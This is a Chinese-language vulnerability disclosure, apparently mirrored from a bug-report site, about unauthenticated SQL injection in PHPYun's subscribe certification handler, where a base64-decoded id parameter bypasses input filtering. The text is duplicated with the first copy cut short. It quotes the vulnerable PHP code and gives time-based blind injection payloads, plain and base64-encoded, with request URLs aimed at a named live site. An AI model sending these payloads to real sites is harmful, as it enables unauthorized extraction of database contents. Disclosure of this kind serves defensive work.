VULHUB ™

### 简要描述： 无需登录。 最新版本。 demo测试。 功能越多 bug越多 bug越多 rank越多。 ### 详细说明： 在model/subscribe.class.php中 ``` function cert_action() { if($_GET['id']) { $arr=@explode("|",base64_decode($_GET['id']));//当时我就震惊了。。。 $email = $arr[0]; $code = $arr[1]; $nid=$this->obj->DB_update_all("subscribe","`status`='1'","`email`='".$email."' and `code`='".$code."'"); header("location:".$this->config['sy_weburl']."/index.php?m=register&c=ok&type=4"); } ``` - - 以前的phpyun 哪会有这么蛋疼的漏洞。 因为解码 所以编码后 无视全局的过滤。 ' or if(ascii(substr((select user()),1,1))=114,sleep(3),0)# JyBvciBpZihhc2NpaShzdWJzdHIoKHNlbGVjdCB1c2VyKCkpLDEsMSkpPTExNCxzbGVlcCgzKSwwKSM= ' or if(ascii(substr((select user()),1,1))=115,sleep(3),0)# JyBvciBpZihhc2NpaShzdWJzdHIoKHNlbGVjdCB1c2VyKCkpLDEsMSkpPTExNSxzbGVlcCgzKSwwKSM= 分别去请求一下 http://www.hr135.com//index.php?m=subscribe&c=cert&id=JyBvciBpZihhc2NpaShzdWJzdHIoKHNlbGVjdCB1c2VyKCkpLDEsMSkpPTExNCxzbGVlcCgzKSwwKSM=...

### 简要描述： 无需登录。 最新版本。 demo测试。 功能越多 bug越多 bug越多 rank越多。 ### 详细说明： 在model/subscribe.class.php中 ``` function cert_action() { if($_GET['id']) { $arr=@explode("|",base64_decode($_GET['id']));//当时我就震惊了。。。 $email = $arr[0]; $code = $arr[1]; $nid=$this->obj->DB_update_all("subscribe","`status`='1'","`email`='".$email."' and `code`='".$code."'"); header("location:".$this->config['sy_weburl']."/index.php?m=register&c=ok&type=4"); } ``` - - 以前的phpyun 哪会有这么蛋疼的漏洞。 因为解码 所以编码后 无视全局的过滤。 ' or if(ascii(substr((select user()),1,1))=114,sleep(3),0)# JyBvciBpZihhc2NpaShzdWJzdHIoKHNlbGVjdCB1c2VyKCkpLDEsMSkpPTExNCxzbGVlcCgzKSwwKSM= ' or if(ascii(substr((select user()),1,1))=115,sleep(3),0)# JyBvciBpZihhc2NpaShzdWJzdHIoKHNlbGVjdCB1c2VyKCkpLDEsMSkpPTExNSxzbGVlcCgzKSwwKSM= 分别去请求一下 http://www.hr135.com//index.php?m=subscribe&c=cert&id=JyBvciBpZihhc2NpaShzdWJzdHIoKHNlbGVjdCB1c2VyKCkpLDEsMSkpPTExNCxzbGVlcCgzKSwwKSM= http://www.hr135.com//index.php?m=subscribe&c=cert&id=JyBvciBpZihhc2NpaShzdWJzdHIoKHNlbGVjdCB1c2VyKCkpLDEsMSkpPTExNSxzbGVlcCgzKSwwKSM= 可以发现响应时间不同。 说明第一位是114 对应的就是r啦 可以写个脚本直接跑。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201412/24191256098812e294891cbc5a29aefe921728c0.jpg" alt="p12.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/24191256098812e294891cbc5a29aefe921728c0.jpg)